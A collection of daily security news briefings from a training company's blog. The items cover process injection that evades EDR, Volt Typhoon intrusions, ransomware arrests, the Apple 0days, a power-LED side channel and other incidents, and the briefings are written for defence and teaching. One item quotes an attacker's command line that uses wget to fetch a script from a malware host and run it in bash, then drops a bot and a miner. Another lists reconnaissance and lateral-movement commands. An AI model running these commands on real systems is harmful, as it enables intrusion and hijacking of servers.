Les Bell and Associates Pty Ltd
Blog entries about Les Bell and Associates Pty Ltd
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
New Process Injection Technique Can Bypass Detection by EDR Products
An increasingly common technique used by malware authors to evade detection is process injection. This replaces the code of an existing, trusted system process with malicious code, injected by the attacker. Because the code is executing within the context of a trusted process, it will be hard for security tools to detect it, and in some cases the technique allows completely file-less exploitation, leaving behind no artifacts on the victim's disk to be examined by malware analysts.
A new process injection technique developed by researchers at Israeli security firm Security Joes is able to evade detection by endpoint detection and response (EDR) applications. The new technique, which its developers call "Mockingjay", does not use Windows API calls such as VirtualAlloc(), VirtualAllocEx(), WriteProcessMemory() and others, which EDR applications typically hook as a means of detecting and blocking their use.
Instead, their new technique leverages a vulnerable dynamic link library - one which possesses a default Read/Write/Execute (RWX) memory section, which can then be abused to inject the desired code. Since the DLL already has RWX memory, this eliminates the need to make calls to memory allocation API's or NtWriteVirtualMemory() and NtProtectVirtualMemory(), which are also closely monitored by EDR software.
The researchers wrote a tool to search the entire Windows filesystem in search of such a DLL, and found one: msys-2.0.dll, which is part of Visual Studio 2022 Community Edition. This DLL has 16 KB of available RWX available - an ideal space for code injection and execution.
The next step was to find a method that could leverage this without making the monitored API calls. Their first approach is to load the vulnerable DLL directly and then find the RWX memory area, using the LoadLibraryW() and GetModuleInformation() system calls. In a proof-of-concept, this was then used to run code, based on the Hell's Gate technique, to create a system call stub and then jump directly into system API's in order to unhook the EDR hooks and allow further activity without observation.
A second approach is to perform process injection on a remote process, again relying on the RWX memory section in msys-2.0.dll. It turns out that this DLL is commonly used by applications that require POSIX emulation, such as GNU utilities, some of which are found in Visual Studio 2022 Community Edition. For their proof-of-concept, the researchers successfully injected code into the ssh.exe (Secure Shell) process, causing it to load yet another DLL which created a reverse shell to a remote machine. The only limitation of this technique is that targeted DLL (in this case msys-2.0.dll) cannot use Address Space Layout Randomization (ASLR) as this would require dyanmic resolution of the address of the RWX memory section.
The Security Joes blog article contains a detailed write-up which is effectively a well-written tutorial on process injection techniques. It also provides some recommendations on detection techniques.
Peixoto, Thiago, Felipe Duarte and Ido Naor, Process Mockingjay: Echoing RWX In Userland To Achieve Code Execution, blog post, 27 June 2023. Available online at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
Europol Investigation Leads to 6,558 Arrests
Back in 2020, French and Dutch police forces were able to infiltrate the operations of EncroChat, an encrypted mobile messaging service that offered its users - mainly criminals - hardened Android phones with just the features they needed: strong encryption, rapid device erasure with a specific PIN or remote deletion by the EncroChat help desk and a tamper-proof boot process. Despite the high price of both the device and its subscription service, EncroChat sold like hot cakes, with tens of thousands of users world wide.
The Joint Investigation Team established by the French and Dutch authorities with assistance from Eurojust and Europol was able to intercept, share and analyse over 115 million criminal conversations, by over 60,000 users. Based on the accumulated statistics from the many countries who used the shared data over the next three years, the results are:
- 6,558 suspects arrested, including 197 High Value Targets
- 7,134 years of imprisonment of convicted criminals up to now
- €739.7 million in cash seized
- €154.1 million frozen in assets or bank accounts
- 30.5 million drug pills seized
- 103.5 tonnes of cocaine seized
- 163.4 tonnes of cannabis seized
- 3.3 tonnes of heroin seized
- 971 vehicles seized
- 271 estates or homes seized
- 923 weapons seized, as well as 21 750 rounds of ammunition and 68 explosives
- 83 boats and 40 planes seized
The investigation, conducted at Europol's headquarters under the name "Operational Task Force EMMA", also prevented violent attacks, attempted murders, large-scale drug importations and corruption. And while many of EncroChat's customers fled to another service called SkyECC, this was also penetrated and dismantled in 2021.
All in all, an impressive result.
Europol, Dismantling encrypted criminal EncroChat communications leads to over 6 500 arrests and close to EUR 900 million seized, news release, 27 June 2023. Available online at https://www.europol.europa.eu/media-press/newsroom/news/dismantling-encrypted-criminal-encrochat-communications-leads-to-over-6-500-arrests-and-close-to-eur-900-million-seized.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Chinese APT Targets Critical Infrastructure, OT
Researchers at managed security provider Crowdstrike have released on an incident involving a Chinese-nexus threat actor which they track as VANGUARD PANDA (also known as Volt Typhoon). The cyber-espionage group consistently targets Zoho ManageEngine ADSelfService Plus in order to obtain initial access, after which they deploy webshells and make use of living-off-the-land techniques to avoid leaving behind detectable artifacts which could be used as IOC's.
In this particular incident, Crowdstrike's Falcon Complete managed-detection-and-response was triggered by suspicious reconnaissance commands - such as listing processes, testing network connectivity, gathering user and group information, and using WMI to enumerate domain trust and DNS zones - executed under an Apache Tomcat web application server running ManageEngine ADSelfService Plus. The use of these commands indicated a familiarity with the target environment, as the commands were executed rapidly and used specific internal hostnames and passwords:
cmd /C "tasklist /svc"
cmd /C "ping -n 1 [redacted]"
cmd /C "ping -n 1 -a [redacted]"
cmd /C "net group "domain controllers" /dom"
cmd /C "net use \\[redacted]\admin$ REDACTED /u:[redacted]"
cmd /C "dir \\[redacted]\c$\Users"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c nltest /DOMAIN_TRUSTS >>C:\Users\[redacted]\AppData\Local\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c Dnscmd . /EnumZones >>C:\Users\[redacted]\AppData\Local\Temp\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
At this point the Crowdstrike team quickly quarantined and triaged the host, notifying the impacted customer while analysing the Apache Tomcat access logs. This revealed multiple POST requests to the file /html/promotion/selfsdp.jspx which, upon analysis, turned out to be a webshell capable of running arbitrary commands by using the /C option of the classic Windows shell, cmd.exe and the ProcessBuilder class. It also attempted to masquerade as part of ManageEngine ADSelfService Plus, using that as its page title and adding legitimate links to help desk software. In fact, selfsdp.jspx will match the EncryptJSP YARA rule provided in a May CISA advisory on Volt Typhoon.
However, a lot of red flags remained: for example, the use of hostnames above indicated a lot of prior reconnaisance and enumeration and the inclusion of passwords indicated that admin accounts had already been compromised - likely before the Falcon Complete sensor had been installed. In fact, the selfsdp.jspx webshell had been written to disk almost six months before the Falcon sensor was installed, and examination of the Apache Tomcat logs correlated its installation with an HTTP POST request to /html/error.jsp - but that file no longer existed, indicating its deletion in an attempt to evade detection and analysis. A lot of related log entries had also vanished - on one day, the entire first 12 hours of the access log had gone.
To cut a long story short - Crowdstrike's blog article provides the full details - the threat actor eventually slipped up. .jsp and .jspx pages - Java Server Pages - contain scriptlets of Java code which are extracted to create .java Java source code files and then compiled into the corresponding .class bytecode files for execution. This is done by a component of Apache Tomcat - the Jasper 2 JSP engine - which places the .java and .class files in a separate directory structure, and while the intruder cleaned up the log files and other artifacts, they missed these.
One of them, ListName_jsp.java, in turn deployed a backdoored version of the tomcat-websocket.jar Apache Tomcat library incorporating a webshell. This was then timestamped to match the timestamp on the original tomcat-websocket.jar file so that it would appear not to have been replaced (although obviously a filesystem verification program would detect its changed digest value).
The Crowdstrike blog article makes fascinating reading and includes some recommendations for detection and mitigation of this attack, which is just one of many the firm has seen against US-based critical infrastructure.
CISA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, cybersecurity advisory AA23-144a, 24 May 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a.
Falcon Complete Team, Business as Usual: Falcon Complete MDR Thwarts Novel VANGUARD PANDA (Volt Typhoon) Tradecraft, blog post, 22 June 2023. Available online at https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/.
Cozy Bear At It Again
In a series of tweets, Microsoft Threat Intelligence has reported a rise in credential attack activity by the Russian state-sponsored APT29, a.k.a. Cozy Bear and NOBELIUM, which the Redmondites track as Midnight Blizzard (I wish they would stick to bears and pandas - it makes life a lot easier!). The attacks target governments, IT service providers, NGO's, defense contractors and critical manufacturing, using a variety of password spray, brute force and token theft techniques, as well as session replay attacks using stolen session credentials likely acquired via illicit sale in dark web markets or Telegram channels.
In this campaign the threat actor is using residential proxy services to hide the real source of their attacks. Residential proxies are a low-cost or free proxies provided by a variety of service providers - I have even seen home users being invited to install proxy servers under the pretext that it will get them additional bandwidth (it won't) or in return for a small income. The problem is that the main purpose of such proxies is to disguise the source of online activities for a variety of dodgy or disreputable activities (which means that home users who naively install them are likely to see their IP addresses blacklisted), although they do have a few legitimate uses, especially in states which restrict their citizens' access to information.
APT29's use of residential proxies for a brief period before moving on also makes it harder for defenders to distinguish these attacks from legitimate traffic and block them.
Microsoft Threat Intelligence, "Microsoft has detected increased credential attack activity...", Twitter thread, 22 June 2023. Available online at https://twitter.com/MsftSecIntel/status/1671579358031486991.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
GIFShell Attack Exploits Teams; Exfiltrates Data Through MS Servers
A new exfiltration technique allows attackers who compromise Microsoft Teams users to exfiltrate data through Microsoft's own servers, making the exfiltration hard to spot by endpoint security products and firewalls, since it looks like legitimate Teams traffic.
The technique, named GIFShell, uses a reverse shell that delivers malicious commands via base64 encoded GIF files in Teams, and exfiltrates the output, also as GIF's, via the Teams infrastructure. The attacker must first somehow convince a user to install a malicious backdoor that executes commands and uploads the results via a GIF URL to a Teams webhook. The backdoor scans the Teams logs for messages with a GIF, extracts the base64 encoded commands and executes them, converting the output to base64 text which is used as the filename for a remote GIF embedded in a Microsoft Teams Survey card that is submitted to the attacker's public webhook.
Microsoft has acknowledged the GIFShell attack, but will not issue a fix, stating that no security boundaries were bypassed, this being a post-exploitation technique.
Johnson, Mic, Understanding the Microsoft Teams Vulnerability: The GIFShell Attack, Latest Hacker News, 20 June 2023. Available online at https://latesthackingnews.com/2023/06/20/understanding-the-microsoft-teams-vulnerability-the-gifshell-attack/.
Verizon 2023 DBIR Available
From the "Dammit - we meant to post this weeks ago" department: Verizon's annual Data Breach Investigations Report is always an interesting read, and we go hunting for it every April/May, when it usually appears. This year's appeared a few weeks ago and is, as usual, very informative. Some interesting factoids:
- 83% of breaches involved external actors, with the majority of attacks financially-motivated, while 19% involved internal actors (sometimes unintentionally though misuse or human error)
- 24% of all breaches involved ransomware; it was used in 62% of incidents committed by organized crime and 59% of financially-motivated incidents
- 50% of all social engineering incidents used pretexting - scenrios invented to trick the victim into giving up information or doing something to enable a breach
- 74% of breaches involve human facors: errors, privilege misuse, theft of credentials or social engineering
- 95% of breaches are financially motivated
It certainly seems like we could obtain high returns from increased efforts in the human factors (education, training and awareness) aspects of our business.
Uncredited, 2023 Data Breach Investigations Report, Verizon, 2023. Available online at https://www.verizon.com/business/en-au/resources/reports/dbir/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
NSA Issues Guidance on BlackLotus
The National Security Agency has issued a mitigation guide for the BlackLotus bootkit. We reported on BlackLotus back in March, following an initial report from ESET, although the malware had been available since at least October 2022. It works by exploiting CVE-2022-21894, a vulnerability which was fixed by Microsoft in their January 2022 updates. However, the affected binaries were not added to the UEFI Secure Boot Deny List Database (DBX), and BlackLotus works by carrying its own copies of those older binaries - a technique referred to as "Baton Drop"
The NSA guide recommends a number of actions:
- Update recovery media and activate optional mitigations
- Harden defensive policies
- Monitor device integrity measurements and boot configuration
- Customize UEFI Secure Boot
It is important to bear in mind that BlackLotus is not a firmware implant, but a bypass of the secure boot process, and it can be removed or quarantined. Currently, it is only known to affect Windows 10 and 11;, but fixes are also available for Windows 8.1. Although BlackLotus does contain some Linux boot binaries, Linux is not one of its targets. Linux admins can defend their systems by removing the Microsoft Windows Production CA 2011 certificate from Secure Boot's DB.
National Security Agency, BlackLotus Mitigation Guide, cybersecurity information, ver 1.0, June 2023. Available online at https://media.defense.gov/2023/Jun/22/2003245723/-1/-1/0/CSI_BlackLotus_Mitigation_Guide.PDF.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Apple Issues Urgent Patches for 0days
Apple has issued urgent patches for two vulnerabilities in the iOS and iPadOS mobile device operating systems, in response to claims the vulnerabilities are being exploited in the wild.
The vulnerabilities are
- CVE-2023-32434: Integer overflow in the kernel due to inadequate input violation
- CVE-2023-32439: Type confusion in Webkit
The vulnerabilities were used by an implant, discovered by Kaspersky Researchers and claimed to be part of a campaign which they have named Operation Triangulation. CVE-2-23-32434 is used during initial exploitation, in order to gain root privileges before deploying the implant in memory - as a result, the implant cannot survive a reboot, and the attackers have to install it again by sending an iMessage with a malicious attachment. If the device is not rebooted, the implant normally removes itself after 30 days, although this can be extended.
Once running, the implant communicates with its C2 server via a RESTful HTTPS API, implemented with the Protobuf library. All traffic takes the form of key-value pairs, encrypted with either 3DES or RSA. The implant sends heartbeat messages, while the C2 server sends any of 24 commands for
- Interacting with the filesystem (creation, modification, exfiltration and removal of files)
- Interacting with processes (listing and terminating them)
- Dumping the victim’s keychain items, which can be useful for harvesting victim credentials
- Monitoring the victim’s geolocation
- Running additional modules, which are Mach-O executables loaded by the implant. These executables are reflectively loaded, with their binaries stored only in memory
The implant is written in Objective-C, which leaves some debugging information, such as the names of class members and methods, in the generated binary. Curiously, many of the resources accessed and operations performed by the implant are given database-related names - for example, a directory is referred to as a table, while a file is called a record, and the C2 server is a DB server - which led the Kaspersky researchers to name the implant TriangleDB.
Kucherin, Georgy, Leonid Bezvershenko and Igor Kuznetsov, Dissecting TriangleDB, a Triangulation spyware implant, blog post, 21 June 2023. Available online at https://securelist.com/triangledb-triangulation-implant/110050/.
Useful Ransomware Educational Resources
With ransomware being seen by the business community as one of the biggest, if not the biggest, current security threat, it is important to keep ourselves and our business principals well-informed about its evolution. A couple of useful resources have appeared in the last couple of days to assist with this.
First, Sophos has started to release a three-part documentary series entitled "Think You Know Ransomware?", compiled from over 100 hours of interviews with cybercriminals, security experts, industry analysts and policy makers. The first episode, "Origins of Cybercrime" is now available, with episodes 2 and 3 due for release over the next two weeks.
Meanwhile, at the Infosecurity Europe conference, Richard de la Torre, marketing manager at Bitdefender, gave a talk on the myths and misconceptions which surround ransomware. In his talk he describes how proactive defenders are making use of threat intelligence to prevent or disrupt attacks, as well as increasingly using decryptors to recover data. However, as de la Torre points out, ransomware operators are now putting much more effort into information exfiltration, taking time to stealthily move throughout the victim's networks, identifying the most valuable datasets as well as discovering whether they have cyber insurance.
Sophos, Think You Know Ransomware?, documentary series, June 2023. Available online at https://www.sophos.com/en-us/content/ransomware-documentary.
Raywood, Dan, Ransomware Misconceptions Abound, To the Benefit of Attackers, Dark Reading, 22 June 2023. Available online at https://www.darkreading.com/vulnerabilities-threats/ransomware-misconceptions-abound-to-the-benefit-of-attackers.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Attacks on Poorly-Secured Linux Servers via sshd
Security researchers at South Korea's AhnLab Security Emergency Response Center have uncovered a campaign being run by an unknown threat actor against poorly-managed Linux servers via the SSH daemon (sshd). Once the actor has gained initial access, they install a range of malware, including the Tsunami DDoS bot, ShellBot, the XMRig Monero cryptominer and Log Cleaner.
Initial access seems to be gained through a brute force attack using common weak credentials (seriously - who uses "abcdefghi" or "123@abc" as a password on the root account?). From this point, a command line is pasted in which downloads and runs a variety of malware:
# nvidia-smi –list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O – ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
Some of the commands here are obviously meant to enumerate hardware such as GPU's which could be used for cryptomining as well as to profile the machine, while the wget commands download the attacker's malware and tools. One of these is a shell script called key which, when run, performs some cleanup and also inserts a public key into the compromised account's ~/.ssh/authorized_keys file, allowing the actor to persist even if the weak password is changed.
The other malware is:
Download URL | Malware |
---|---|
ddoser[.]org/key | Downloader Bash |
ddoser[.]org/logo | ShellBot DDoS Bot |
ddoser[.]org/siwen/bot | ShellBot DDoS Bot |
ddoser[.]org/siwen/a | Tsunami DDoS Bot |
ddoser[.]org/siwen/cls | MIG Logcleaner v2.0 |
ddoser[.]org/siwen/clean | 0x333shadow Log Cleaner |
ddoser[.]org/siwen/ping6 | Privilege escalation malware |
ddoser[.]org/top | XMRig CoinMiner (compressed file) |
ASEC's report provides a complete rundown on this list of malware.
There's an obvious lesson here: SSH is mostly used for system administration, and administrators should be smart enough to know better. Passwords are a losing proposition - weak passwords especially so - and setting up public-key authentication with OpenSSH and PuTTY is very easy, after which password logins can be disabled completely, by setting
PasswordAuthentication no
in /etc/ssh/sshd_config. After that, one can sleep easily because this, and similar distributed, password brute-forcing campaigns will simply not work.
Sanseo, Tsunami DDoS Malware Distributed to Linux SSH Servers, blog post, 20 June 2023. Available online at https://asec.ahnlab.com/en/54647/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
US Government Pursues Ransomware Operators
The US Government is continuing to pursue ransomware operators around the world. In their latest success, the US Department of Justice has announced the FBI's arrest of a 20-year-old Russian national, Ruslan Magomedovich Astamirov in connection with LockBit ransomware operations.
'According to a criminal complaint obtained in the District of New Jersey, from at least as early as August 2020 to March 2023, Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware. Specifically, Astamirov directly executed at least five attacks against victim computer systems in the United States and abroad.
'"Astamirov is the third defendant charged by this office in the LockBit global ransomware campaign, and the second defendant to be apprehended,” said U.S. Attorney Philip R. Sellinger for the District of New Jersey. “The LockBit conspirators and any other ransomware perpetrators cannot hide behind imagined online anonymity. We will continue to work tirelessly with all our law enforcement partners to identify ransomware perpetrators and bring them to justice."'
Astamirov is the second LockBit-affiliated Russian to be arrested.
Meanwhile, as the CL0P gang continues to exploit the MOVEit Transfer file transfer software and starts to extort the victims, the US State Department's Rewards for Justice program is offering up to $US10 million in rewards leading to the identification or location of CL0P and similar groups.
Uncredited, Russian National Arrested and Charged with Conspiring to Commit LockBit Ransomware Attacks Against U.S. and Foreign Businesses, US Department of Justice, 15 June 2023. Available online at https://www.justice.gov/opa/pr/russian-national-arrested-and-charged-conspiring-commit-lockbit-ransomware-attacks-against-us.
Rewards for Justice, "Advisory from @CISAgov, @FBI: ... ", tweet, 17 June 2023. Available online at https://twitter.com/RFJ_USA/status/1669740545403437056.
Android RAT Masquerades as Chat Apps
Researchers at ESET have been tracking an updated version of the GravityRAT spyware for Android, which is being distributed as trojaned versions of the messaging apps BingeChat and Chatico. These apps have never been distributed via the Google Play store, but instead are being promoted through malicious web sites - although how victims are lured to them is unknown.
GravityRAT has been around since at least 2015, and is a cross-platform remote access trojan, with versions for Windows, macOS and Android; its operator is unknown but possibly based in Pakistan, as it focuses on Indian targets. ESET tracks the threat actor as SpaceCobra.
This new variant actually does provide chat functionality, being based on the open-source OMEMO Instant Messenger app, but before the user even logs in to the app, it has already contacted its C2 server, exfiltrating the user's data and waiting for commands. GravityRAT can exfiltrated call logs, the user's contact list, SMS messages, various types of files and the device locations; the new variant can also delete files, contacts and call logs. It is also capable of exfiltrating backup files created by WhatsApp Messenger, which is extremely popular in India.
The ESET report contains IOC's and a mapping to MITRE ATT&CK techniques.
Stefanko, Lukas, Android GravityRAT goes after WhatsApp backups, blog post, 15 June 2023. Available online at https://www.welivesecurity.com/2023/06/15/android-gravityrat-goes-after-whatsapp-backups/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Ransomware Permanently Closes Hospital
A salutory tale about cyber resilience, business continuity and the risk posed by ransomware: CBS News reports that a hospital in Central Illinois is closing down, at least in part due to a ransomware attack.
St, Margaret's Health, which operates in the city of Spring Valley, Illinois, will shut down today, blaming a devastating ransomware attack in 2021 which prevented it from filing insurance claims. This seems to be the first time that a hospital has blamed cybercriminals for its closure, although other factors, such as staffing costs and supply chain issues, also played a part.
CBS Chicago Team, Central Illinois hospital closing after 2021 ransomware attack, news report, 13 June 2023. Available online at https://www.cbsnews.com/chicago/news/st-maragrets-health-central-illinois-hospital-closing/.
MOVEit Transfer: The Gift That Just Keeps Giving
File transfer software vendor Progress Software has had to disclose yet another critical vulnerability in their MOVEit Transfer product. At the time of writing, no fix is available, and the suggested mitigation is to block all HTTP and HTTPS traffic to MOVEit Transfer machines. The firm notes that once this is done:
- Users will not be able to log on to the MOVEit Transfer web UI
- MOVEit Automation tasks that use the native MOVEit Transfer host will not work
- REST, Java and .NET APIs will not work
- MOVEit Transfer add-in for Outlook will not work
But other than that, it will be business as usual, with the SFTP and FTP protocols still working as normal - which renders using MOVEit somewhat pointless, since its major convenience is a browser-based interface that is easy for users.
Meanwhile, CNN News reports that a number of US Government agencies have been hit by ransomware group Cl0p, including the Department of Energy, as well as one of its subcontractors.
Progress Software, MOVEit Transfer Critical Vulnerability – CVE Pending (June 15, 2023), web article, 15 June 2023. Available online at https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023.
Lyngaas, Sean, Exclusive: US government agencies hit in global cyberattack, news report, 15 June 2023. Available online at https://edition.cnn.com/2023/06/15/politics/us-government-hit-cybeattack/index.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
CISA Releases Two Advisories
The US Cybersecurity & Infrastructure Security Agency has released two advisories which should prove useful to enterprises everywhere.
The first, issued in conjunction with the NSA, addresses the recent vulnerabilities in baseboard management controllers (BMC's) discovered by Eclypsium. BMC's are buried deep within system boards and get access to the system even before the UEFI BIOS starts execution, allowing a threat actor to install bootkits, or disable the TPM and UEFI secure boot process. In fact, the BMC remains active even when a server is powered down.
The CISA/NSA hardening guide lists a number of recommended actions, including updating BMC credentials, using VLAN segmentation to isolate BMC's from the other network infrastructure, performing routine update checks and other suggestions.
The other CISA advisory is one of a series on understanding ransomware threat actors, and deals specifically with the LockBit Ransomware-as-a-Service group. LockBit affiliates are probably the most active of all ransomware groups, and the advisory provides advice on the vulnerabilities they typically exploit, as well as the TTP's they use. It also provides a number of suggested mitigations.
Uncredited, CISA and NSA Release Joint Guidance on Hardening Baseboard Management Controllers (BMCs), cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-nsa-release-joint-guidance-hardening-baseboard-management-controllers-bmcs.
Uncredited, CISA and Partners Release Joint Advisory on Understanding Ransomware Threat Actors: LockBit, cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-partners-release-joint-advisory-understanding-ransomware-threat-actors-lockbit.
Microsoft Patches Windows Kernel Vuln, Doesn't Enable Patch
A curious situation has arisen with yesterday's updates for Windows Server 2022, Windows 10 and Windows 11: the Redmondites shipped a patch for an important kernel information disclosure vulnerability, but did not enable the fix. The vulnerability, which could allow an authenticated but unprovileged attacker to view the contents of the heap of a privileged process, was awarded a base CVSS 3.1 score of 4.7 - it would have been higher if the attack was not so complex, requiring coordination with another, privileged process.
At a guess the likely delay in enabling the fix is due to the time required to perform comprehensive regression testing; after all, everything makes use of the heap and the kernel, so there could be corner cases with applications doing strange things that a fix would break. However, users who have relatively simple installations, especially in high-threat environments, e.g. facing the Internet, may want to enable the fix, and Microsoft has released a knowledge base article providing instructions.
Enabling the patch simply involves add a registry entry, with different values for the various different affected platforms. You might want to test the effects in a lab environment before deploying this too widely, though.
Uncredited, KB5028407: How to manage the vulnerability associated with CVE-2023-32019, Windows Support knowledge base article, 13 June 2023. Available online at https://support.microsoft.com/en-gb/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080.
Yet Another Sidechannel Attack - This Time Using Power LED's
In a paper to be presented at Black Hat 23, researchers from Cornell and Ben Gurion universities demonstrate a novel technique to recover cryptographic keys from a device by analyzing video footage of the device's power LED. This works because the cryptographic computations performed by the CPU change the device's power consumption, which in turn affects the brightness of the power LED.
The attack uses an ingenious technique to increase the camera's sampling rate from the normal rate of 60 frames per second, which would be too slow, to 60 thousand measurements per second by exploiting the camera's rolling shutter.
In their first demonstrations, the researchers were able to recover a 256-bit ECDSA key from a smart card by analyzing video footage of the power LED of a smart card reader via a hijacked Internet-connected security camera located 16 meters away from the smart card reader.
The device need not even have a power LED itself, but merely be connected to something that does; in their second attack the researchers were able to recover a 378-bit SIKE key from a Samsung Galaxy S8 by analyzing video footage of the power LED of Logitech Z120 USB speakers that were connected to the same USB hub used to charge the phone. In this case, the camera was an iPhone 13 Pro Max.
I shall be interested to see whether this technique will work against the LED's of a beefy tower computer when a security key is being used as part of multi-factor authentication. If it does, I shall be disabling the LED's and adding a roll of thick black electrical tape to my travel kit.
Nassi, Ben, et. al., Video-Based Cryptanalysis: Extracting Cryptographic Keys from Video Footage of a Device’s Power LED, conference presentation, August 2023. Available online at https://www.nassiben.com/video-based-crypta.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
